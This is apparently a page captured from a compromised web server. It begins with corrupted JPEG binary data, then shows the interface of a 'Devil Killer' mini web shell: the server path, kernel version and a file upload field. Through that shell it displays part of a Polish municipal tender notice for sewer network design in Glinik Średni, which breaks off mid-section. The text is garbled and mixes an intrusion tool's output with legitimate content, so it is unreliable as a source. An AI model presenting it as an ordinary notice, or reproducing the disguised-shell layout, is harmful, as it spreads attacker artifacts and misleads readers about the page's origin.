JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250707/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250707/0031228501-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Opracowanie dokumentacji projektowej w zakresie budowy i rozbudowy sieci kanalizacji sanitarnej … z przepompowniami, zasil. energetycznym przepompowni i przyłączami dla cz. miejscowości Glinik Średni </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA FRYSZTAK</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 690582186</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. ks. Wojciecha Blajera 20</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Frysztak</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">38-130</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">172777110</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">172777920</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ug@frysztak.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.frysztak.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Opracowanie dokumentacji projektowej w zakresie budowy i rozbudowy sieci kanalizacji sanitarnej … z przepompowniami, zasil. energetycznym przepompowni i przyłączami dla cz. miejscowości Glinik Średni </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a6492ff9-5ce7-4b5c-aa43-abd762e0e139</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00312285</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-07-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00081356/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Opracowanie dokumentacji projektowej w zakresie budowy i rozbudowy sieci kanalizacji sanitarnej … z przepompowniami, zasil. energetycznym przepompowni i przyłączami dla cz. miejscowości Glinik Średni</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/frysztak <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Niniejsze postępowanie o udzielenie zamówienia prowadzi się wyłącznie w języku polskim.2. Postępowanie, którego dotyczy niniejsza specyfikacja warunków zamówienia (SWZ), jest oznaczone znakiem:<br/>Gpr.271.9.2025. Wykonawcy winni we wszelkich kontaktach z zamawiającym powoływać się na wyżej podane oznaczenie.3. Osobą<br/>uprawnioną do kontaktu z Wykonawcami jest: Andrzej Mocek. 4. Postępowanie prowadzone jest w języku polskim w formie<br/>elektronicznej za pośrednictwem platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/frysztak 5.Zamawiający<br/>dopuszcza, awaryjnie, komunikację za pośrednictwem poczty elektronicznej. Adres poczty elektronicznej osoby uprawnionej do<br/>kontaktu z Wykonawcami: andrzej.mocek@ug.frysztak.pl .</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Zamawiający, określa niezbędne<br/>wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl, pod adresem<br/>https://platformazakupowa.pl/pn/frysztak tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s, 2) komputer klasy PC lub MAC o<br/>następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych -<br/>MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje, 3) zainstalowana dowolna przeglądarka internetowa, w przypadku<br/>Internet Explorer minimalnie wersja 10 0.,<br/>4) włączona obsługa JavaScript, 5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf, 6)<br/>Platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8, 7) Oznaczenie czasu odbioru<br/>danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera<br/>synchronizowanego z zegarem Głównego Urzędu Miar.<br/>2. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego: 1)akceptuje warunki korzystania z<br/>platformazakupowa.pl określone w Regulaminie zamieszczonym na<br/>stronie internetowej pod linkiem w zakładce „Regulamin&#34; oraz uznaje go za wiążący, 2) zapoznał i stosuje się do Instrukcji składania<br/>ofert/wniosków dostępnej pod linkiem. 3.Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z<br/>Instrukcją korzystania z platformazakupowa.pl, w szczególności za sytuację, gdy zamawiający zapozna się z treścią oferty przed<br/>upływem terminu składania ofert (np. złożenie oferty w zakładce „Wyślij wiadomość do zamawiającego”). Taka oferta zostanie<br/>uznana przez Zamawiającego za ofertę handlową i nie będzie brana pod uwagę w przedmiotowym postępowaniu. 4. Zamawiający<br/>informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania wniosków o<br/>wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu<br/>platformazakupowa.pl znajdują się w zakładce „Instrukcje dla<br/>Wykonawców&#34; na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje.<br/>5. W przypadku przekazywania w postępowaniu lub konkursie dokumentu lub dokumentów w formacie skompresowanym (w<br/>spakowanym pliku), opatrzenie takiego spakowanego pliku kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub<br/>podpisem osobistym jest równoznaczne z opatrzeniem wszystkich dokumentów zawartych w tym pliku kwalifikowanym podpisem<br/>elektronicznym, podpisem zaufanym lub<br/>podpisem osobistym. 6. Maksymalny rozmiar jednego pliku przesyłanego za pośrednictwem dedykowanych formularzy do złożenia,<br/>zmiany, wycofania oferty wynosi 150 MB natomiast przy komunikacji wielkość pliku to maksymalnie 500 MB. 7. Rozszerzenia plików<br/>wykorzystywanych przez Wykonawców powinny być zgodne z Załącznikiem nr 2<br/>do “Rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych<br/>i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych”, zwanego dalej<br/>Rozporządzeniem KRI. Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .docx .xls .xlsx .jpg (.jpeg) ze szczególnym<br/>wskazaniem na .pdf<br/>8. W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z rozszerzeń: a) .zip b) .7Z<br/>9. Dokumenty złożone w plikach z powszechnymi rozszerzeniami, które nie występują w Rozporządzeniu KRI zostaną uznane za<br/>złożone nieskutecznie.<br/>10. Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi<br/>maksymalnie 10MB, oraz na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu<br/>osobistego, który wynosi maksymalnie 5MB.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia<br/>4 maja 2016 r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>1) administratorem Pani/Pana danych osobowych jest Gmina Frysztak, ul. Ks. Wojciecha Blajera 20, 38-130 Frysztak, e-mail:<br/>ug@frysztak.pl, tel: 17 2777110.<br/>2) administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod adresem e-mail: iod@ug.frysztak.pl<br/>.<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w związku z Ustawą z dnia 11 września 2019<br/>r. – Prawo zamówień publicznych, w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego,<br/>prowadzonym w trybie przetargu nieograniczonego.<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 74 ustawy PZP oraz podmiot z, którym Administrator zawarł umowę powierzenia danych – OpenNexus Sp. z o.o. –<br/>operator platformy zakupowej do prowadzenia postępowań.<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 PZP przez okres 4 lat od dnia zakończenia postępowania<br/>o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22<br/>RODO.<br/>8) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w<br/>przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie<br/>dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających<br/>na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie<br/>zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego<br/>postępowania o udzielenie zamówienia);<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie<br/>może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2<br/>RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia<br/>korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy<br/>interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9)przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO<br/>przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla<br/>przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1.Nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">Gpr.271.9.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest opracowanie projektu budowlanego budowy i rozbudowy sieci kanalizacji sanitarnej grawitacyjnej i tłocznej z przepompowniami , zasilaniem energetycznym przepompowni i przyłączami dla części miejscowości Glinik Średni ,gmina Frysztak obejmujące niżej wymienione elementy :<br/><br/>1) Opracowanie map sytuacyjno -wysokościowych w skali 1:500 do celów projektowych dla obszaru oznaczonego kolorem <br/> na załącznikach graficznych nr 12 do SWZ dla obszaru do 100 ha w tym :<br/>a) 2 komplety odbitek z matrycy w formie papierowej <br/>b) 1 komplet na nośniku pendrive ( 2 sztuki) w formacie DXF i DWG umożliwiający współpracę z programami przeznaczonymi do projektowania komputerowego, dla terenu objętego projektowaniem tj. część wsi Glinik Średni i część Pułanek ( miejsce włączenia do sieci). <br/>Mapy należy wykonać zgodnie z obowiązującymi przepisami prawa geodezyjnego i kartograficznego oraz instrukcjami branżowymi.<br/>Matryca mapy podlega przekazaniu Zamawiającemu po wykorzystaniu przez Wykonawcę włącznie z kompletnym projektem budowlanym.<br/>2) Opracowanie projektu budowlanego budowy i rozbudowy sieci kanalizacji sanitarnej grawitacyjnej i tłocznej z przepompowniami , zasilaniem energetycznym przepompowni i przyłączami dla części miejscowości Glinik Średni z włączeniem do istniejącej sieci kanalizacji sanitarnej w miejscowości Glinik Średni i Pułanki , gmina Frysztak obejmujący:<br/> a) opracowanie 4 egzemplarzy projektu zagospodarowania terenu <br/> b) opracowanie 4 egzemplarzy projektu architektonicznego <br/> c) opracowanie 4 egzemplarzy projektu technicznego <br/> d) opracowanie 4 egzemplarzy niezbędnych projektów wykonawczych ( przekroczenia dróg, cieków, <br/> montaż przepompowni ścieków) w wersji opisowej i rysunkowej<br/> e) opracowanie dokumentacji geologicznej w zakresie niezbędnym do oceny możliwości lokalizacji sieci na terenach <br/> osuwiskowych zgodnie z mapą zagrożeń osuwiskowych Starostwa Powiatowego w Strzyżowie<br/> f) opracowanie niezbędnej dokumentacji geologiczno- inżynieryjnej dla projektowanych obiektów,<br/> g) opracowanie operatów i uzyskanie pozwoleń wodno -prawnych na przekroczenie cieków wodnych <br/> h) opracowanie dwóch egzemplarzy z projektu zagospodarowania terenu z nasieniem sieci i przepompowni na <br/> mapie ewidencyjnej w skali 1:2000 <br/> Ponadto należy przewidzieć włączenie projektowanej sieci kanalizacyjnej do istniejącej sieci kanalizacji sanitarnej <br/> wsi Glinik Średni i Pułanki wraz z przeliczeniem mocy istniejącej pompowni ścieków w tej miejscowości w celu <br/> zapewnienia prawidłowego jej funkcjonowania z ewentualnym wykonaniem zwiększenia średnicy odcinka <br/> tłocznego z istniejącego fi 110 mm , na fi 160 mm.<br/> Projekty należy opracować na aktualnych podkładach geodezyjnych zgodnie z przepisami prawa budowlanego.<br/> Orientacyjny zakres opracowania projektów budowlanych obejmuje zaprojektowanie:<br/> - około 45 szt. przyłączy do budynków <br/> - 6-7 szt. przepompowni ścieków przydomowych z zasilaniem energetycznym i systemem monitoringu,<br/>- 3-4 szt. przepompowni ścieków sieciowych z zasilaniem energetycznym i systemem monitoringu<br/> - około 8,5 km sieci kanalizacyjnej grawitacyjnej z przyłączami <br/>- około 1,2 km sieci kanalizacji tłocznej <br/>3) Opracowanie przedmiarów i kosztorysów inwestorskich dla zakresu robót objętych projektem w tym:<br/>a) oddzielnego opracowania przedmiarów i kosztorysów inwestorskich dla sieci kanalizacyjnej <br/>b) oddzielnego opracowania przedmiarów i kosztorysów inwestorskich dla przyłączy kanalizacyjnych <br/>Definicja przyłącza zgodnie z art.2 ust.5 ustawy z dnia 7 czerwca 2001 roku o zbiorowym zaopatrzeniu w wodę i zbiorowym odprowadzaniu ścieków ( j.t Dz.U. z 2024 roku ,poz. 757) – przyłącze kanalizacyjne- odcinek przewodu łączącego wewnętrzną instalację kanalizacyjną w nieruchomości odbiorcy usług z siecią kanalizacyjną , za pierwszą studzienką , licząc od strony budynku, a w przypadku jej braku do granicy nieruchomości gruntowej.<br/>4)	Opracowanie ogólnych i szczegółowych specyfikacji technicznych wykonania i odbioru robót w formie opisowej i <br/>rysunkowej bez używania nazw własnych urządzeń i materiałów producenta .<br/>5) Uzyskanie w imieniu Inwestora wszelkich wymaganych uzgodnień w tym także uzyskanie prawa do dysponowania <br/> terenem na cele budowlane w formie umów cywilno – prawnych lub decyzji z właścicielami i zarządcami terenów<br/>6)	Zamawiający informuje , że w zakresie decyzji o środowiskowych uwarunkowaniach inwestycji zostanie ona przekazana Wykonawcy z klauzulą ostateczności po podpisaniu umowy.<br/>7)	Uzyskanie prawomocnej decyzji lokalizacji inwestycji celu publicznego w terminie obowiązywania umowy należy do obowiązków Wykonawcy,<br/>8)	Materiały do uzyskania decyzji lokalizacji inwestycji celu publicznego muszą zostać przedstawione na mapie zasadniczej w skali 1:1000 z wykazem działek biorących udział w postępowaniu , danymi ich właścicieli lub zarządców oraz danymi adresowymi .<br/>9) Opracowanie wyciągu z dokumentacji technicznej (projekt i opis techniczny) w formie opisu przedmiotu zamówienia <br/> do postępowania o udzielenie zamówienia publicznego.<br/>10) Pełnienie nadzoru autorskiego nad realizacją zaprojektowanej inwestycji oraz akceptacji wprowadzanych zmian <br/> zgodnie z przepisami prawa budowlanego. <br/>11) Uzyskanie wszelkich uzgodnień w zakresie przekroczenia kanalizacją sanitarną cieków wodnych , włącznie z <br/> opracowaniem operatu wodno-prawnego i uzyskaniem decyzji pozwolenia wodno-prawnego na przekroczenia <br/> cieków.<br/>12) Uzyskanie wszelkich uzgodnień oraz opracowanie dokumentacji do uzyskania decyzji w zakresie przekroczenia <br/> siecią kanalizacji sanitarnej dróg gminnych.<br/>13) Opracowanie projektu wstępnego – ZAMAWIAJĄCY wymaga aby wykonanie projektów budowlanych zostało <br/> poprzedzone wykonaniem projektów wstępnych , których rozwiązania będą opiniowane i uzgadniane przez <br/> ZAMAWIAJĄCEGO , co będzie podstawą do kontynuowania prac projektowych.<br/>14) Opracowanie informacji dotyczącej bezpieczeństwa i ochrony zdrowia w przypadkach gdy jej opracowanie jest <br/> wymagane na podstawie odrębnych przepisów<br/>2. Wymagania, które musi spełniać zamawiana dokumentacja:<br/>1) Wykonawca przed złożeniem oferty powinien zapoznać się z warunkami wykonania zamówienia w przedmiocie opracowania map do celów projektowych w Powiatowym Ośrodku Dokumentacji Geodezyjnej i Kartograficznej w Strzyżowie.<br/>2) Dokumentacja projektowa winna być wykonana zgodnie z obowiązującym w tym zakresie prawem , m.in:<br/>- przepisami ustawy z dnia 07.07.1994 roku Prawo budowlane ( j.t. Dz. U. z 2025 roku, poz. 418 z późniejszymi zmianami)<br/>- rozporządzeniem Ministra Rozwoju i Technologii z dnia 20.12.2021 roku w sprawie szczegółowego zakresu i formy dokumentacji projektowej , specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego ( Dz. U. z 2021 roku, poz. 2454) <br/>- rozporządzeniem Ministra Rozwoju z dnia 11.09.2020 roku w sprawie szczegółowego zakresu i formy projektu budowlanego ( j.t Dz. U. z 2022 roku, poz. 1679 z późniejszymi zmianami) <br/>- rozporządzeniem Ministra Rozwoju i Technologii z 20.12.2021 roku w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego , obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym ( Dz.U. z 2021 roku, poz. 2458) <br/>- Studium Uwarunkowań i Kierunków Zagospodarowania Przestrzennego Gminy Frysztak na lata 2004 i dalej, oraz obowiązującymi planami zagospodarowania przestrzennego dla terenów objętych projektowaniem<br/>3) Projekty zagospodarowania terenu , projekty techniczne , projekty wykonawcze , kosztorysy i przedmiary robót oraz specyfikacje techniczne wykonania i odbioru robót należy również przygotować w wersji elektronicznej ( pliki z rozszerzeniem pdf- dokumenty tekstowe lub tekstowo -graficzne ) na nośniku pendrive w ilości 2 komplety. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71322000-1 - Usługi inżynierii projektowej w zakresie 